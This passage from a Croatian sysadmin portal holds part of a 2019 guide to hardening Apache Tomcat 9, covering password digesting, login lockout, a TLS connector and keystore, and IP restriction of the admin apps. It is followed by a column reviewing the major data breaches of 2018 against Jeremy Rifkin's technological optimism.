3. Kad jednom upogonimo alate Manager i Host Manager, u conf/tomcat-users.xml imat ćemo lozinke admina Tomcata u čitljivom obliku. Neugodna situacija ali, srećom, riješiva jer su nam ASF-vci omogućili digestiranje tih lozinki uporabom algoritama klase SHA-2. Upareno s dodatnim Tomcatovim kontrolama, rješenje zadovoljava i high-security normu ukoliko su lozinke oblikovane "po pravilima službe" (ukratko, ekstradugačke i kompleksne). U primjeru što slijedi provući ćemo lozinku L0zin-ka: admina Tomica kroz SHA-512 hashing funkciju (uključeno je soljenje hasha), usput se suprotstaviti brute force napadima probijanja lozinke.

a) Izgled conf/server.xml nakon podešavanja defaultnog virtualnog hosta za sprječavanje brute force napada i za digestiranje lozinki korisnika upisanih u conf/tomcat-users.xml.

</Realm>

b) U komandnoj ljusci, u /bin direktoriju, zadajemo:

./digest.sh -a SHA-512 -h org.apache.catalina.realm.MessageDigestCredentialHandler L0z1n-ka:

Naredba će prikazati digestiranu lozinku, taj podulji niz kopiramo u conf/tomcat-users.xml (vidi naredni korak)

c) Izgled tomcat-users.xml nakon zamjene Tomičine tekstualne lozinke digestiranom:

Nadalje Tomica tijekom ulogiravanja upisuje lozinku L0z1n-ka:, kao i ranije. Pogriješi li više od triput, bit će mu onemogućen pristup daljnjih pola sata; događaj se bilježi u conf/catalina.out pa možemo definirati alert.

4. Tuneliranje i enkripcija HTTP prometa danas je podrazumijevani oblik računalne komunikacije. TLS nam treba i za komercijalne aplikacije i za Tomcatove "webolike" admin alate. Pravilo je, naime, da se u okolinama visoke razine zaštite podataka i samog sustava TLS primjenjuje i na relaciji proxy -> Tomcat, znači, Mačak zaprima konekcije na port TCP 8443. Zaštita HTTP sesija ka Manageru i Host Manageru, složit ćemo se, neupitna je potreba.

Prvo ćemo kreirati keystore, datoteku-skladište digitalnih certifikata. Za potrebe Tomcata koristimo Finin demo (besplatni) certifikat imena devs.fina.hr u .pfx formatu. Certifikati CA-eva Finine Demo PKI infrastrukture javno su dostupni - moraju biti - pa smo i njih skinuli, u .cer formatu, na admin stanicu. Nećemo se zamarati vrijednim ali zahtjevnim Openssl i Keytool alatima; na svoju stanicu - svejedno je li pod Windows ili Linux OS-om - instalirali smo besplatan i susretljiv KeyStore Explorer. Kreirat ćemo PKCS #12 keystore jer je napredniji od .jks formata.

Create a new KeyStore > odabrati format PKSC #12
Tools > Import trusted certificate > importirati certifikat Fininog root CA
Tools > Import trusted certificate > importirati certifikat Fininog issuing CA
Tools > Import key pair > PKCS #12 > importirati TLS certifikat (plus lozinka kojom štitimo privatni ključ) > postaviti lozinku
pokrenuti proceduru spremanja, ime neka bude devs-kstore i postaviti lozinku kojom štitimo tu datoteku (na slici)
kopirati devs-kstore na CentOS u /opt/tomcat9/tomcerts/ + primijeniti na tomcerts chown -R u korist računa tomsvc.

Slijedi pipaviji posao - osposobljavanje Tomcatovog defaultnog hosta "localhost" za prihvat HTTPS konekcija. Napravimo si rezervnu kopiju datoteke conf/server.xml, potom u editoru poput Nano otvorimo izvornu server.xml i krenemo s modifikacijama.

a) Pametni kakvi jesmo, već smo shvatili da smo samo zaboravna ljudska bića, utoliko, prvi zahvat je u stvari podsjetnik i za nas i za naše kolege; ispod elementa <Host name="localhost" appBase="webapps" unpackWARs="true" autoDeploy="true" definiramo mrežno ime defaultnog virtualnog hosta.

.... kod ....

</Host>

b) Zakomentiramo ili izbrišemo postojeći konektor za HTTPS konekcije, prepoznatljiv je po atributu <Connector port="8443", i umjesto njega ukopiramo niži tekst, to je HTTPS konektor konfiguriran za TLS 1.2 konekcije. Svakako pobrišemo oble zagrade i sve što je u njima jer to su pojašnjenja, dio su ovog članka a ne konektora.

<Connector port="8443" protocol="org.apache.coyote.http11.Http11NioProtocol"

maxThreads="400" (atribut se redovito navodi jer služi za fino ugađanje Tomcata)

enableLookups="false" (doprinosi performansama)

SSLEnabled="true" (obavezno za TLS konekcije)

scheme="https"(obavezno za TLS konekcije)

secure="true"(specifičan atribut, vidi dokumentaciju HTTP konektora)

sslProtocol="TLSv1.2"(namećemo zadnju općeprihvaćenu verziju TLS protokola)

sslEnabledProtocols="TLSv1.2"(namećemo zadnju općeprihvaćenu verziju TLS protokoa)

honorCipherOrder="true"(prepreka napadu naguravanja ranjivih algoritama)

ciphers="TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384,TLS_ECDHE_ECDSA_WITH_AES_256_GCM_SHA384,

TLS_ECDH_RSA_WITH_AES_256_GCM_SHA384,TLS_ECDH_ECDSA_WITH_AES_256_GCM_SHA384,

TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256,TLS_ECDHE_ECDSA_WITH_AES_128_GCM_SHA256,

TLS_ECDH_RSA_WITH_AES_128_GCM_SHA256,TLS_ECDH_ECDSA_WITH_AES_128_GCM_SHA256,

TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384,TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA384,

TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA,TLS_ECDHE_ECDSA_WITH_AES_256_CBC_SHA,

TLS_ECDH_RSA_WITH_AES_256_CBC_SHA384,TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA384,

TLS_ECDH_RSA_WITH_AES_256_CBC_SHA,TLS_ECDH_ECDSA_WITH_AES_256_CBC_SHA,

TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256,TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA256,

TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA,TLS_ECDHE_ECDSA_WITH_AES_128_CBC_SHA,

TLS_ECDH_RSA_WITH_AES_128_CBC_SHA256,TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA256,

TLS_ECDH_RSA_WITH_AES_128_CBC_SHA,TLS_ECDH_ECDSA_WITH_AES_128_CBC_SHA"

keystoreType="PKCS12"(default je JKS pa ovo moramo navesti)

keystoreFile="/opt/tomcat9/tomcerts/devs-kstore"

keystorePass="Zap0rka!" />

Atribut Ciphers (specificira algoritme zaštite TLS konekcije i podataka u transportu) neozbiljno je popratiti kratkim komentarom, nije na odmet upoznati se s ovim štivom: https://www.owasp.org/index.php/TLS_Cipher_String_Cheat_Sheet. Usput, upravo smo se OWASP preporuka držali pri odabiru ciphersa za našu konfiguraciju.

c) Nakon restarta Tomcata slijedi probno spajanje s admin stanice kao klijentskog računala (otvorili smo port TCP 8443 na vatrozidu servera, jel' tako?). U lokalno skladište certifikata instaliramo spomenuta dva Finina CA certifikata a u lokalnu Hosts unesemo IP adresu Tomcat servera i vežemo ju uz ime devs.fina.hr. Za uobičajeno spajanje na glavnu stranicu u preglednik ćemo upisati https://devs.fina.hr:8443.

d) Ako nam nisu potrebni, sada možemo onesposobiti HTTP i AJP konektore. Doduše, komuniciramo li direktno sa Tomcatom, možda ćemo htjeti postaviti skretanje svih HTTP zahtjeva ka svim aplikacijama (tipično: http://devs.fina.hr:8080) na HTTPS, postavljanjem filtera u conf/web.xml, neposredno iznad elementa </web-app>. Da bi ova redirekcija radila, HTTP konektor mora biti aktivan!

<security-constraint>

<web-resource-collection>

<web-resource-name>HTTP-to-HTTPS</web-resource-name>

<url-pattern>/*</url-pattern>

</web-resource-collection>

<user-data-constraint>

<transport-guarantee>CONFIDENTIAL</transport-guarantee>

</user-data-constraint>

</security-constraint>

Niža slika nam pokazuje da smo dobro zbrinuli Tomcat i njegove aplikacije.

5. Tragikomična zbrka vlada oko kontrole pristupa admin aplikacijama Manager i Host Manager po IP adresi, pa ćemo i to obraditi. U nižem primjeru koristimo jedan od Tomcatovih ventila koji ispituju ili modificiraju HTTP-request pakete prije nego što ih na obradu preuzme Tomcatova mašinerija. Prema admin aplikacijama dopustit ćemo propuštanje samo onih paketa koji dolaze s, recimo, dvije IP adrese u vlasništvu dviju admin stanica. Djelujemo na datoteke /META-INF/context.xml aplikacija Manager i Host Manager tako da u njih upišemo kako je niže prikazano. Sintaksa dopušta uporabu asteriska, recimo, izrazom 192.168.10.* dozvoljavamo pristup svim hostovima s predmetne interne mreže.

6. Niže mjere zaštite ne možemo primijeniti bez dobre suradnje s aplikativcima, utoliko, skrećemo na njih pozornost ali ih ne razrađujemo jer su priča za sebe:

Aktiviranje Security Managera - nametanjem pravila aplikacijama (u ovu kategoriju spada i Tomcat jer je i on Java aplikacija) posredstvom datoteke conf/catalina.policy, kojim će aplikativnim i sistemskim resursima pristupati, i na koji način, efektivno postavljamo aplikacije u sandboxing režim rada. ASF upozorava da će pokretanje Tomcata s opcijom -security (catalina.sh start -security ili startup.sh - security) vrlo vjerojatno izazvati nepravilan rad aplikacija ukoliko iste nisu razvijane za rad pod kontrolom SM-a. Ovo djeluje obeshrabrujuće jer sugerira dosta posla no, s druge strane, i dobitak je velik - Security Manager značajno unaprijeđuje zaštitu sustava kao cjeline. Napomena: Security Lifecycle Listener iz 2. točke nije povezan sa SM-om.
Odabir Security Realm komponente - čime se, u suštini, s Tomcatom povezuje izvorište korisničkih računa i aplikativnih uloga za jednu ili više aplikacija. Realm je višeslojna softverska konstrukcija koja Tomcatu omogućuje zaštitu aplikacija (uključujući sebe) i pripadajućih joj podataka tako što provjerava identitet korisnika i njegove dozvole. U produkcijskim implementacijama tehnološka osnovica realma redovito je neka baza podataka ili LDAP servis, tada se bavimo JDBC/DataSource ili JNDI realmima, pri čemu ih možemo i kombinirati, naime, aplikacije se mogu konfigurirati tako da koriste različite realme.
Security by obscurity mijenjanjem brojnih defaultnih vrijednosti legitimna je metoda zaštite jer uljeza dovodi u "minsko polje" nepoznanica, veća je vjerojatnost pravovremene detekcije ili će barem ostaviti tragove..., ali bez suradnje i pedantnog dokumentiranja opako ćemo se zamjeriti kolegama.

pet, 2019-01-04 13:51 - Ratko Žižek

Vijesti:

Kuharice:

Za sistemce

Kategorije:

Sigurnost

Vote:

No votes yet

story_tag:

Početak je godine, još smo opijeni slavljem i dobrim željama. Vrijeme je za sumiranje postignutog i postavljanje novih ciljeva. Kao i uvijek, klatno se njiše između dobrog i lošeg, a ljudi su, čini se, spremniji fokusirati se na jednu od dvije strane, rijetki su u stanju sagledati cjelinu.

Prije svega, recimo da imamo razloga za optimizam. Čovječanstvo nikad nije bilo u tako dobrom stanju kao danas. Možda vam se ova tvrdnja čini pretjeranom, u vijestima bi se našlo dovoljno argumenata za njeno pobijanje. Ali u prošlosti je sve bilo lošije nego danas! Broj nasilnih smrti od ratova i kriminala stalno se smanjuje, proizvodi se višak roba, uključujući i hranu, tako da je najveći problem tko će to sve kupiti! Zato buja marketing. Nema razloga da bi itko na planeti bio gladan, a ipak se to događa. Zapinje u raspodjeli, jedni imaju previše, drugi premalo. Svijet nije savršen, treba ga popravljati, ali u načelu ide na bolje. Dio zasluga za to ima tehnologija.

Jeremy Rifkin, vizionar naše tehnološke sadašnjosti i neposredne budućnosti, savjetnik je brojnim državama i EU. On govori o tome da živimo u vrijeme Treće industrijske revolucije. Internet je unio velike promjene u društvo, promijenio je način na koji pristupamo informacijama, način na koji kupujemo, prodajemo, družimo se s ljudima.

Naredna faza revolucije bit će izgradnja pametne energetske mreže, na čemu se intenzivno radi već godinama (mogli ste to primijetiti ako prisustvujete IBM-ovim konferencijama, oni to već godinama ističu kao jedan do svojih razvojnih prioriteta). Struja će se sve više proizvoditi iz lokalnih, obnovljivih izvora, trošiti lokalno a višak isporučivati u pametnu mrežu koja bi trebala smanjiti gubitke i racionalirati distribuciju. Pametne zgrade će na fasadi proizvoditi struju koju troše, toplinu koju razvijaju računala i drugi strojevi neće bacati van, već će je koristiti za zagrijavanje vode i prostorija.

Treća faza revolucije očekuje nas izgradnjom pametne prometne mreže. Svijet će biti premrežen senzorima i računalima, automobili će voziti bez vozača, mreža će ih upućivati na manje opterećene prometnice, upozoravati na zastoje, brinuti o štednji goriva i o izbjegavanju sudara.

Promjene će se odraziti i na položaj ljudske populacije. Rifkin predviđa kraj rada! Bit će sve manje potrebe za ljudskim radom u svijetu kojim upravlja umjetna inteligencija, a poslove obavljaju strojevi i računala. Predviđa i kraj tržišta kakvo smo poznavali, ljudi će sve manje kupovati stvari, a sve više ih iznajmljivati kad im zatrebaju. Zašto kupiti automobil ako ti 90% vremena stoji parkiran? Zašto se do posla ne bi prevezao automobilom ili biciklom kojeg iznajmiš na sat? Kad ga sparkiraš, preuzet će ga netko drugi. Zašto gomilati knjige na policama, kad ih možeš čitati on-line? Plaćat ćemo nešto sitno za svako čitanje. Zastarjet će i kupovanje ploča, filmova, jer će nam sve biti dostupno na mreži. Zašto kupiti bušilicu, ako je koristiš jednom godišnje? Itd. its. Sve će više jačati industrija zabave i uslužne djelatnosti.

Rifkin je u nedavnom intervjuu pohvalio EU koja radi na unapređivanju električne mreže, ali i Kinu koja se velikim koracima prihvatila modernizacije. Za SAD kaže da ih Trump vraća u 1950. jer želi proizvoditi struju iz ugljena. Iako je Amerikanac, on predviđa da će SAD postati država drugog reda! Rifkin je velik zagovornik Europske Unije. SAD su bile predvodnica u 19. stoljeću, a EU je to danas. EU je najveće unutarnje tržište, najveći svjetski izvoznik, tu su ljudi najobrazovaniji, najzdraviji, najdulji je životni vijek, najbolja kvaliteta života.

Kao pravi vizionar, Rifkin se bavi pozitivom. Na upozorenja novinara o tome da će privatnost bivati sve ugroženija, on će se lakonski složiti, no to je za njega samo usputni problem koji se može riješiti.

S obzirom na to da se u ovoj kolumni bavimo informacijskom sigurnošću osjećamo potrebu da, iako se načelno slažemo sa Rifkinovim predviđanjima, istaknemo loše strane ugrožavanja privatnosti. Optimistično raspoloženje na brzinu će nam se pokvariti kad pogledamo top listu najgorih sigurnosnih incidenata IT industrije u minuloj godini. Na Mreži ćete naći brojne članke o tome, odabrali smo jedan koji je objavio Wired. Nećemo prepričavati clanak, preporučujemo da ga na miru pročitate. Prenijet ćemo samo ukratko osnovne informacije.

Članak spominje kako su još 2017. otkriveni napadi ruskih hakera na američku energetsku mrežu. Možemo samo zamisliti kako bi to izgledalo da su je ugasili, ostavili SAD bez struje?!

U ožujku 2018. podignuta je optužnica protiv Iranskih hakera radi napada na 144 američka sveučilišta, 176 sveučilišta u 21 državi, 47 privatnith tvrtki, UN, Američku Energetsku regulatornu komisiju, računala saveznih država Hawai i Indiana. Ukrali su 31 terabajt podataka, čija se vrijednost procjenjuje na 3 milijarde dolara.

Radi loše konfiguracije baza podataka mnoštvo je osobnih podataka zaštićeno minimalnim sigurnosnim mjerama. Tako je tvrtka Exactis ugrozila privatnost 340 miliona ljudi čiji su podaci čuvani na javno dostupnim serverima. Twitter je u svibnju objavio da su "nepažnjom" u internim logovima čuvali zaporke svojih korisnika u plaintext načinu. Gubitak korisničkih podataka prijavio je i Facebook. Tvrtka Under Armor otkrila je da su se hakeri dočepali podataka o 150 miliona korisnika njihove aplikacije MyFitnessPal. Slična aplikacija je i Pumpup, čiji je server bio dostupan na mreži i na njega se moglo ulogirati bez zaporke!

Krajem svibnja objavljena je viijest da su Rusi inficirali preko 500.000 rutera različitih proizvođača, smještenih širom svijeta malwareom nazvanim VPNFilter. Time je stvoren botnet koji se može koristiti za krađu podataka, slanje spama, DoS napade, manipuliranje mrežom i slično.

Mogli bismo ovako nabrajati danima. Ali zaustavit ćemo se na jednom incidentu koji nam se čini najtragičnijim.

U siječnju 2018. novinari lista Tribune objavili su kako su preko WhatsUpa za 500 rupija kupili akreditive za pristup bazi Aadhaar, što je indijski pandan za naš OIB. Nakon toga imali su pristup osobnim podacima 1,1 milijardu stanovnika Indije. Dostupni podaci uključuju ime, adresu, broj telefona, e-mail adresu, fotografiju. Za dodatnih 300 rupija nudio se softver pomoću kojeg se mogu ispisati dokumenti za bilo kojeg stanovnika Indije! Trebalo im je 500 rupija (otprilike 7 dolara) i desetak minuta da se dočepaju podataka.

Prisjetio sam se znanca koji je bio žrtva krađe identiteta u Hrvatskoj. Kriminalac koji je uvlačio naivne ljude u sumnjive investicije imao je osobnu kartu s njegovim podaciima, samo je fotografija bila zamijenjena. Otkrio je to kad su mu usred noći specijalci razbili ulazna vrata i odnijeli ga kao vreću. Nakon nekoliko dana provedenih u zatvoru pojavili su se prevareni ljudi i izjavili da to nije čovjek koji im je odnio novac. Iako je oslobođen (hladno i bez isprike), ljaga je ostala, susjedi ne vjeruju njegovoj priči da je žrtva zabune. Nikad nije dobio odgovor na pitanje kako je to moguće da je netko izradio na izgled valjanu osobnu iskaznicu s njegovim osobnim podacima? Haker izvana, ili "insider job"?

Zaštita osobnih podataka ipak nije usputan problem koji ćemo lako riješiti! Kraj rada koji Rifkin predviđa neće nastupiti preko noći, a za informatičare će još dugo biti posla. Netko mora te silne sprave izmišljati, instalirati, održavati. A informacijska sigurnost bit će potrebnija nego ikad. Shvatite to i kao savjet za izbor karijere.

ned, 2019-01-13 21:23 - Aco Dmitrović

Kategorije: